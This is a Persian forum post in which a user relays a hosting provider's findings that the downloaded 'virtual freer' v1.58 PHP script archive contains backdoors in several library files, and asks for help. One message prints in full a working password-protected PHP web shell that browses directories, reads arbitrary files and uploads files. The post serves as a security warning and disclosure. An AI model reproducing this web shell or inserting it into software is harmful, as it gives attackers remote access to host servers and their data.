سلام خدمت اساتید
من ورژن 1.58 که آخرین ورژن هست رو از سایت دانلود کردم , اما موقع انتقال با ارور تروجان مواجه شدم و وقتی که مدیر سایت گفتم این مطلب رو برام فرستاد که من این متن رو برای طراح اسکریت ایمیل کردم و گفتم :
کد PHP:
سلام
خسته نباشید
من اومدم اسکریپت رو به هاستم انتقال بدم که دیدم ارور تروجان میگیره
با مدیریت هاست در تماس بودم که این مطلب رو در مورد بکدور و... برام ارسال کرد که عینا براتون ارسال میکنم.
فایل هم ضمیمه شد
فکر کردم قبل از پرسیدن و مطرح کردن تو وب هاستینگ تاک با شما صحبت کنم
منتظر حل مشکل هستم
با سلام خدمت شما
طی بررسی فایل آرشیو ارسالی کدهای بکدور در ۳ فایل زیر در این آرشیو شناسایی شد:
virtual_freer_v1.58/include/libs/smarty/sysplugins/smarty_internal_templateparser.php
virtual_freer_v1.58/include/libs/smarty/sysplugins/smarty_internal_configfileparser.php
virtual_freer_v1.58/include/libs/nusoap.php
جزییات دقیق کدهای شناسایی شده در فایل پیوست تیکت قابل مشاهده می باشد.
این کدها امکان اجرای کدهای ریموت و یا آپلود شل را بر روی سایت میزبان فراهم می کنند. در صورتیکه این فایل را از سایت مرجع و اصلی طراح اسکریپت دریافت ننموده اید پیشنهاد می شود از استفاده از این آرشیو نصب بر روی سرویس خود پرهیز نمایید و به جای آن فایل آرشیو را از سایت اصلی دریافت نمایید.
چنانچه فایل را از سایت اصلی دریافت نموده اید، خواهشمند است حتما موضوع را به طراح اسکریپت/مدیر سایت مورد نظر اطلاع داده و از ایشان بخواهید حتما این مشکل را پیگیری و چگونگی اینجکت کدها بکدور به آرشیو نصب ارایه شده را پیگیری و بررسی های امنیتی دقیق در این مورد را پیگیری کنند. همچنین حتما کد اسکریپت را به صورت کامل بررسی و از عدم وجود کدهای بکدور دیگر در آرشیو ارایه شده اطمینان حاصل نموده و پس از پاکسازی کامل و رفع مشکل امنیتی آرشیو نصب جدید را در اختیار شما قرار دهند.( فایل آرشیو تیکت حاوی کدهای مخرب شناسایی شده است شما متیوانید این فایل را جهت پیگیری در اختیار طراح/مدیر سایتی که آرشیو را از آن سایت دریافت نموده اید قرار دهید)
و این فایل رو dmz هم برام فرستاد که بدم (آپلود کردم)
طراح هم در جواب بهم گفتن که برم از سایت و دوباره دانلود کنم
و باز به مدیر هاست گفتم و ایشون باز یه ارور دیگه گرفتن و من باز برای طراح اسکریپت فرستادم که اصلاح کنن , اما 3 روزه که خبری نشده
کد PHP:
سلام مجدد
این رو هم بخونید لطفا
با سلام خدمت شما
در فایل آرشیو جدید ارسالی کدهای مخرب شناسایی شده حذف شده اند. اما یک مورد کد بکدور دیگر که قبلا شناسایی نشده بود در فایل
virtual_freer_v1.58/include/libs/smarty/plugins/function.engine.php
مشاهده شد. این کد نیز یک کد بکدور برای آپلود فایل دلخواه می باشد.
کد شناسایی شده به شرح زیر است:
============
$user='16d1a558492edec3ed7775be2942c1cd';
$pass='16d1a558492edec3ed7775be2942c1cd';
if ($_SERVER["PHP_AUTH_USER"] == "" || $_SERVER["PHP_AUTH_PW"] == "" || md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"]) !=$pass) {
header("HTTP/1.0 401 Unauthorized");
header("WWW-Authenticate: Basic realm=\"eshghi");
echo "<h1>Authorization Required.</h1>";
die();
}else{
error_reporting(0);
set_magic_quotes_runtime(0);
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){$s="\\";
}else{$s="/";
}$ad=$_REQUEST['ad'];
if ($ad){chdir($ad);}else{$ad=getcwd();
}if ($_FILES["ff"]){move_uploaded_file($_FILES["ff"]["tmp_name"], $_FILES["ff"]["name"]);}
if ($hr = opendir($ad)) {while($f = readdir($hr)){if(is_dir($f)){$df=$df.$f.'
';}else{$lf=$lf.$f.'
';}}closedir($hr);
}$form='<form action="'.$_SERVER['PHP_SELF'].'" method=post>';
echo '<center><textarea cols=90 rows=20>';
if($_GET['cme']){opendir($_GET['cme']);
}else{echo $df.$lf;};
echo'</textarea>'.$form.'Change Dir : <input name=ad size=50 value='.getcwd().$s.'>
<input type=submit value=Go></form>'.$form.'Read File : <input name=cme size=50 value=id>
<input type=submit value=Read!></form>
<form action="'.$me.'" method=post enctype=multipart/form-data>
Upload : <input size=50 type=file name=ff > <input type=hidden name=ad value='.getcwd().'>
<input type=submit value=Send></form><br>';
if(isset ($_POST['cme'])){
$myFile = $_POST['cme'];
$fh = fopen($myFile, 'r');
if($theData = fread($fh, filesize($myFile))){
fclose($fh);
echo '<textarea clos=90 rows=20>'.$theData.'</textarea>';
}
else{
echo "File Could Not Found!!";
}}}
?>
============
با توجه به این اطلاعات ظاهرا کد آرشیو به صورت کامل توسط طراح اسکریپت بررسی و پاکسازی نشده است. اطمینان کامل از عدم وجود کدهای مخرب تنها با بررسی دقیق کدهای تمامی اسکریپتها امکانپذیر می باشد در غیر اینصورت تضمینی برای شناسایی تمامی کدهای مخرب وجود ندارد(کما اینکه در بررسی اولیه انجام شده کد مورد اشاره در بالا شناسایی نشده بود). با توجه به این موضوع پیشنهاد می شود تا بررسی کامل فایلهای آرشیو نصب اسکریپت که ممکن است چند روز به زمان نیاز داشته باشد از نصب این اسکریپت بر روی سرویس خود پرهیز نمایید. البته در صورت نگهداری آرشیو های جداگانه از فایلها و نگهداری هش تمامی فایلهای بسته در یک محل امن و یا استفاده از ابزازهای مدیریت سوروس برنامه هایی مانند
git
برای مدیریت و نگهداری سورس برنامه توسط طراح اسکریپت، به راحتی امکان شناسایی چنین نفوذها و دستکاری هایی و اصلاح سریع آنها توسط طراح وجود خواهد داشت.
این رو هم فرستادم اما خبری نشد
از دوستان کسی هست که بتونه این مشکل رو برطرف بکنه ؟
اخطار امنیتی - گزارش باگ
